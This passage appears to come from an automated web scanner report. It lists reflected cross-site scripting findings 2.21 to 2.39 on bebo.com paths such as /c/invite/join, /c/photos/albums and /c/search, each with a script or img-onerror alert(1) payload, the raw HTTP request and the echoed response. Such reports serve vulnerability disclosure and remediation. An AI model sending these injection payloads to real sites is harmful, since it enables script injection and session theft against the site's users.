User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14137
Date: Wed, 06 Jul 2011 14:07:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/invite/joina7c09'><script>alert(1)</script>33e80344b01&QueryString=&Lang=fr'>
...[SNIP]...

2.21. http://www.bebo.com/c/invite/join [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cf77"><img%20src%3da%20onerror%3dalert(1)>07344209637 was submitted in the REST URL parameter 3. This input was echoed as 9cf77"><img src=a onerror=alert(1)>07344209637 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/invite/join9cf77"><img%20src%3da%20onerror%3dalert(1)>07344209637 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14231
Date: Wed, 06 Jul 2011 14:07:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-invite-join9cf77"><img src=a onerror=alert(1)>07344209637" >
...[SNIP]...

2.22. http://www.bebo.com/c/invite/join [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95e49'%3b2c9f03bb687 was submitted in the REST URL parameter 3. This input was echoed as 95e49';2c9f03bb687 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/invite/join95e49'%3b2c9f03bb687 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 13943
Date: Wed, 06 Jul 2011 14:07:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
gName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/invite/join95e49';2c9f03bb687/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.23. http://www.bebo.com/c/photos/albums [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83e70'%3b0dc4117bbd6 was submitted in the REST URL parameter 2. This input was echoed as 83e70';0dc4117bbd6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/photos83e70'%3b0dc4117bbd6/albums HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14229
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
em.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/photos83e70';0dc4117bbd6/albums/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');p
...[SNIP]...

2.24. http://www.bebo.com/c/photos/albums [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9aaa<script>alert(1)</script>78e54a70e84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/photosc9aaa<script>alert(1)</script>78e54a70e84/albums HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14422
Date: Wed, 06 Jul 2011 14:07:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/photosc9aaa<script>alert(1)</script>78e54a70e84/albums page, please try again.</div>
...[SNIP]...

2.25. http://www.bebo.com/c/photos/albums [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c6fb0'><script>alert(1)</script>92bae72a79e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/photosc6fb0'><script>alert(1)</script>92bae72a79e/albums HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14440
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/photosc6fb0'><script>alert(1)</script>92bae72a79e/albums&QueryString=&Lang=nl'>
...[SNIP]...

2.26. http://www.bebo.com/c/photos/albums [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c86"><img%20src%3da%20onerror%3dalert(1)>003cdead8cf was submitted in the REST URL parameter 2. This input was echoed as 34c86"><img src=a onerror=alert(1)>003cdead8cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/photos34c86"><img%20src%3da%20onerror%3dalert(1)>003cdead8cf/albums HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14523
Date: Wed, 06 Jul 2011 14:07:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-photos34c86"><img src=a onerror=alert(1)>003cdead8cf-albums" >
...[SNIP]...

2.27. http://www.bebo.com/c/photos/albums [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb1ed'><script>alert(1)</script>5a54fcd6248 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/photos/albumseb1ed'><script>alert(1)</script>5a54fcd6248 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14155
Date: Wed, 06 Jul 2011 14:07:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/photos/albumseb1ed'><script>alert(1)</script>5a54fcd6248&QueryString=&Lang=fr'>
...[SNIP]...

2.28. http://www.bebo.com/c/photos/albums [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ad90a<img%20src%3da%20onerror%3dalert(1)>0e7c1b6f097 was submitted in the REST URL parameter 3. This input was echoed as ad90a<img src=a onerror=alert(1)>0e7c1b6f097 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/photos/albumsad90a<img%20src%3da%20onerror%3dalert(1)>0e7c1b6f097 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14231
Date: Wed, 06 Jul 2011 14:07:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="content" class="content-wrap">Could not find action: albumsad90a<img src=a onerror=alert(1)>0e7c1b6f097.</div>
...[SNIP]...

2.29. http://www.bebo.com/c/photos/albums [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e305'%3be2820506b7a was submitted in the REST URL parameter 3. This input was echoed as 1e305';e2820506b7a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/photos/albums1e305'%3be2820506b7a HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 13961
Date: Wed, 06 Jul 2011 14:07:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
ame=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/photos/albums1e305';e2820506b7a/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.30. http://www.bebo.com/c/photos/albums [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/albums

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cb98"><img%20src%3da%20onerror%3dalert(1)>1bd7bb69789 was submitted in the REST URL parameter 3. This input was echoed as 8cb98"><img src=a onerror=alert(1)>1bd7bb69789 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/photos/albums8cb98"><img%20src%3da%20onerror%3dalert(1)>1bd7bb69789 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14249
Date: Wed, 06 Jul 2011 14:07:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-photos-albums8cb98"><img src=a onerror=alert(1)>1bd7bb69789" >
...[SNIP]...

2.31. http://www.bebo.com/c/photos/view [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9ffdf<script>alert(1)</script>65fe05ee977 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/photos9ffdf<script>alert(1)</script>65fe05ee977/view HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14404
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/photos9ffdf<script>alert(1)</script>65fe05ee977/view page, please try again.</div>
...[SNIP]...

2.32. http://www.bebo.com/c/photos/view [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a008f'%3b1394c6af40d was submitted in the REST URL parameter 2. This input was echoed as a008f';1394c6af40d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/photosa008f'%3b1394c6af40d/view HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14211
Date: Wed, 06 Jul 2011 14:07:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
em.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/photosa008f';1394c6af40d/view/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pag
...[SNIP]...

2.33. http://www.bebo.com/c/photos/view [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fea54"><img%20src%3da%20onerror%3dalert(1)>ca5a51baf93 was submitted in the REST URL parameter 2. This input was echoed as fea54"><img src=a onerror=alert(1)>ca5a51baf93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/photosfea54"><img%20src%3da%20onerror%3dalert(1)>ca5a51baf93/view HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14505
Date: Wed, 06 Jul 2011 14:07:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-photosfea54"><img src=a onerror=alert(1)>ca5a51baf93-view" >
...[SNIP]...

2.34. http://www.bebo.com/c/photos/view [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 455fd'><script>alert(1)</script>138643e700 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/photos455fd'><script>alert(1)</script>138643e700/view HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14413
Date: Wed, 06 Jul 2011 14:07:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/photos455fd'><script>alert(1)</script>138643e700/view&QueryString=&Lang=nl'>
...[SNIP]...

2.35. http://www.bebo.com/c/photos/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 103df'%3bc6d06da1c12 was submitted in the REST URL parameter 3. This input was echoed as 103df';c6d06da1c12 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/photos/view103df'%3bc6d06da1c12 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 13943
Date: Wed, 06 Jul 2011 14:07:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
gName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/photos/view103df';c6d06da1c12/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.36. http://www.bebo.com/c/photos/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4a2db<img%20src%3da%20onerror%3dalert(1)>03474b4f7cb was submitted in the REST URL parameter 3. This input was echoed as 4a2db<img src=a onerror=alert(1)>03474b4f7cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/photos/view4a2db<img%20src%3da%20onerror%3dalert(1)>03474b4f7cb HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14213
Date: Wed, 06 Jul 2011 14:07:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="content" class="content-wrap">Could not find action: view4a2db<img src=a onerror=alert(1)>03474b4f7cb.</div>
...[SNIP]...

2.37. http://www.bebo.com/c/photos/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6167c"><img%20src%3da%20onerror%3dalert(1)>1abe4877bca was submitted in the REST URL parameter 3. This input was echoed as 6167c"><img src=a onerror=alert(1)>1abe4877bca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/photos/view6167c"><img%20src%3da%20onerror%3dalert(1)>1abe4877bca HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14231
Date: Wed, 06 Jul 2011 14:07:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-photos-view6167c"><img src=a onerror=alert(1)>1abe4877bca" >
...[SNIP]...

2.38. http://www.bebo.com/c/photos/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3720f'><script>alert(1)</script>cb368be3171 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/photos/view3720f'><script>alert(1)</script>cb368be3171 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14137
Date: Wed, 06 Jul 2011 14:07:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/photos/view3720f'><script>alert(1)</script>cb368be3171&QueryString=&Lang=fr'>
...[SNIP]...

2.39. http://www.bebo.com/c/search [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/search

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce915'%3be214f87d530 was submitted in the REST URL parameter 2. This input was echoed as ce915';e214f87d530 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/searchce915'%3be214f87d530 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14166
Date: Wed, 06 Jul 2011 14:07:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

